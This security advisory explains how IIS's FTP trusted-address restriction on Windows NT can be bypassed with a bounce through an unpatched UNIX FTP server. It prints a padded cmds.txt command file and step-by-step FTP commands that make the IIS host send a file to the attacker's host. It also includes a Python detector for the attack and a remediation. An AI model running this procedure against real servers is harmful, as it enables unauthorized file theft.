COMMAND

    Internet Information Server

SYSTEMS AFFECTED

    Win NT

PROBLEM

    "Nemo" made research  on by-passing Internet  Information Server's
    ftp service's security.   The Microsoft ftp  service, as  provided
    for  by  Internet  Information  Server  can be configured to allow
    connections  from  only  certain  ("trusted")  IP  addresses. This
    paper describes how this  security arrangement could be  by-passed
    depending on the configuration of the remote network.

    This is based on a "bounce" attack, but it is important to note
    that the target ftp server does not have to have the registry
    setting "EnablePortAttack" set to 1; in other words, the server
    does not have to be configured to allow an ftp bounce attack.  You
    do, however, need one ftp server to run the bounce attack from.
    This server has to be included in the range of trusted IP
    addresses.  It will most likely be an unpatched UNIX server on the
    same subnet as the target IIS server.

    Basically you are using this server as a platform to log into the
    IIS server and steal what files you can.  The login process and
    other commands are contained in a file called cmds.txt and are
    sent to the IIS server using the ftp bounce attack.  When a login
    occurs this way, because of buffering, the ftp service on IIS will
    read (or at least look for) a command every 497 characters after
    the first character of each command.  So cmds.txt will begin with
    "user anonymous"; 497 characters after the `u' of user, IIS will
    read the next command.  The characters in between can be garbage.

	USER ANONYMOUS
	1234567890abcdefghijklmnopqrstuvwxyz1
	1234567890abcdefghijklmnopqrstuvwxyz2
	1234567890abcdefghijklmnopqrstuvwxyz3
	1234567890abcdefghijklmnopqrstuvwxyz4
	1234567890abcdefghijklmnopqrstuvwxyz5
	1234567890abcdefghijklmnopqrstuvwxyz6
	1234567890abcdefghijklmnopqrstuvwxyz7
	1234567890abcdefghijklmnopqrstuvwxyz8
	1234567890abcdefghijklmnopqrstuvwxyz9
	1234567890abcdefghijklmnopqrstuvwxyz0
	1234567890abcdefghijklmnopqrstuvwxyzA
	1234567890abcdefghijklmnopqrstuvwxyzB
	1234567890abcdefghijklmnopqPASS A@HERE
	1234567890abcdefghijklmnopqrstuvwxyz1
	1234567890abcdefghijklmnopqrstuvwxyz2
	1234567890abcdefghijklmnopqrstuvwxyz3
	1234567890abcdefghijklmnopqrstuvwxyz4
	1234567890abcdefghijklmnopqrstuvwxyz5
	1234567890abcdefghijklmnopqrstuvwxyz6
	1234567890abcdefghijklmnopqrstuvwxyz7
	1234567890abcdefghijklmnopqrstuvwxyz8
	1234567890abcdefghijklmnopqrstuvwxyz9
	1234567890abcdefghijklmnopqrstuvwxyz0
	1234567890abcdefghijklmnopqrstuvwxyzA
	1234567890abcdefghijklmnopqrstuvwxyzB
	1234567890abcdefghijklmnopqrstPORT 194,126,80,119,105,34
	1234567890abcdefghijklmnopqrstuvwxyz1
	1234567890abcdefghijklmnopqrstuvwxyz2
	1234567890abcdefghijklmnopqrstuvwxyz3
	1234567890abcdefghijklmnopqrstuvwxyz4
	1234567890abcdefghijklmnopqrstuvwxyz5
	1234567890abcdefghijklmnopqrstuvwxyz6
	1234567890abcdefghijklmnopqrstuvwxyz7
	1234567890abcdefghijklmnopqrstuvwxyz8
	1234567890abcdefghijklmnopqrstuvwxyz9
	1234567890abcdefghijklmnopqrstuvwxyz0
	1234567890abcdefghijklmnopqrstuvwxyzA
	1234567890abcdefghijklmnopqrstuvwxyzB
	1234567890abcdvRETR FILE.TXT
	1234567890----- more garbage

    Commands are in upper case here so they stand out.  So here's  how
    the attack would go (scenario):

	HostA is a UNIX host running an ftp service that has not been
	patched against bounce attacks.  You can log into this server
	anonymously and have write permission on at least one
	directory.  HostA's IP address is 123.123.123.120.

	HostB is an NT server running IIS that allows anonymous
	connections, but only from IP addresses in the same subnet
	range, e.g. 123.123.123.1 to 123.123.123.254.  HostB has the IP
	address 123.123.123.123.

	1. Connect to HostA, log in and change to a directory where you
	   have write permission.

	2. Issue the command "quote pasv".  The server will respond
	   saying it is going into passive mode.  Note the address and
	   the port (ADD,ADD,ADD,ADD,PORT,PORT).  Enter this value into
	   your cmds.txt file and save it.  Then issue the command
	   "quote stor file.txt".  The session will appear to hang.  In
	   actual fact it is waiting patiently for someone to connect to
	   its port and send it file.txt.

	3. Open another session with HostA.  Change to the same
	   directory and upload cmds.txt.

	4. Now issue the command "quote port 123,123,123,123,0,21".
	   This primes a connection to the target IIS server.

	5. Issue the command "quote retr cmds.txt".  This causes HostA
	   to make a connection to HostB, and after the 3-way TCP
	   handshake the contents of cmds.txt are transferred to HostB.
	   HostB reads the first command, USER anonymous.  It will reply
	   "Anonymous access allowed, send identity (e-mail name) as
	   password."  Not that you'll see this: the message is directed
	   at HostB's TCP port 20 (ftp-data).  497 characters after the
	   `U' of USER the IIS server will read the next command, "PASS
	   a@here".  It will reply "user anonymous logged in".  Our next
	   command (497 characters after the `P' of PASS) is PORT
	   ADD,ADD,ADD,ADD,PORT,PORT.  Note: this does not trip the IIS
	   ftp service's built-in check that rejects a PORT command
	   naming an IP address different from the client's, because the
	   address given is HostA's own and HostA is the client on this
	   connection.  This sets up a connection to the waiting port on
	   HostA that we opened in step 2.  The command "RETR file.txt"
	   will then cause HostB to send file.txt down to HostA, and thus
	   the security setup has been bypassed.
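	A defender-side check, added here as an example and not part of
	Nemo's write-up: it inspects the command stream arriving on the IIS
	control port and flags the two artefacts this bounce leaves behind,
	a control connection whose source port is the bounce server's
	ftp-data port 20, and FTP verbs buried mid-line in garbage-padded
	lines.  The sample stream, the 512-byte line threshold and the
	function names are constructed for the example; the check does not
	depend on the exact 497-character stride.

```python
import re
from dataclasses import dataclass
from typing import List

# Verbs the write-up shows being smuggled through the padded stream.  No word
# boundary is required: in the example the verb follows garbage directly
# ("...mnopqPASS A@HERE").
FTP_VERB = re.compile(rb"(USER|PASS|PORT|RETR|STOR)\s+\S", re.IGNORECASE)
MAX_CMD_LINE = 512   # assumed site threshold; real FTP command lines are tiny
FTP_DATA_PORT = 20   # an active-mode data connection originates from here

@dataclass
class Finding:
    kind: str
    detail: str

def inspect_control_session(src_ip: str, src_port: int, stream: bytes) -> List[Finding]:
    """Return the artefacts of a bounced login seen on the IIS control port."""
    findings: List[Finding] = []
    # 1. A real client dials port 21 from an ephemeral port; the bounce
    #    server's data connection dials it from TCP 20.
    if src_port == FTP_DATA_PORT:
        findings.append(Finding("bounce-source",
                                f"{src_ip}:{src_port} is an ftp-data source port"))
    # 2. Commands hidden inside oversized, garbage-padded lines.  A compliant
    #    client sends one short command per line, so a verb that is not at
    #    column 0, or a line far longer than any real command, is suspicious.
    for lineno, line in enumerate(stream.splitlines(), 1):
        if len(line) > MAX_CMD_LINE:
            findings.append(Finding("oversized-line",
                                    f"line {lineno} is {len(line)} bytes"))
        for m in FTP_VERB.finditer(line):
            if m.start() != 0:
                findings.append(Finding("embedded-verb",
                    f"line {lineno}: {m.group(1).decode()} at offset {m.start()}"))
    return findings

# Constructed sample modelled on the cmds.txt above, with a 504-byte garbage
# run between commands; not a capture from a real host.
GARBAGE = b"1234567890abcdefghijklmnopqrstuvwxyz"
SAMPLE_STREAM = (b"USER ANONYMOUS\n"
                 + GARBAGE * 14 + b"PASS A@HERE\n"
                 + GARBAGE * 14 + b"PORT 123,123,123,120,4,1\n"
                 + b"RETR FILE.TXT\n")

def demo() -> List[str]:
    """Finding kinds for the sample arriving from HostA's ftp-data port."""
    return [f.kind for f in inspect_control_session("123.123.123.120", 20, SAMPLE_STREAM)]
```

	A normal session (short lines, every verb at column 0, ephemeral
	source port) yields no findings, so the check can run on the raw
	command log without tuning to the padding length.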

SOLUTION

    The obvious resolution to this problem is to exclude the IP address
    of the server that is unpatched against ftp bounce attacks from the
    trusted range, or alternatively to patch that server.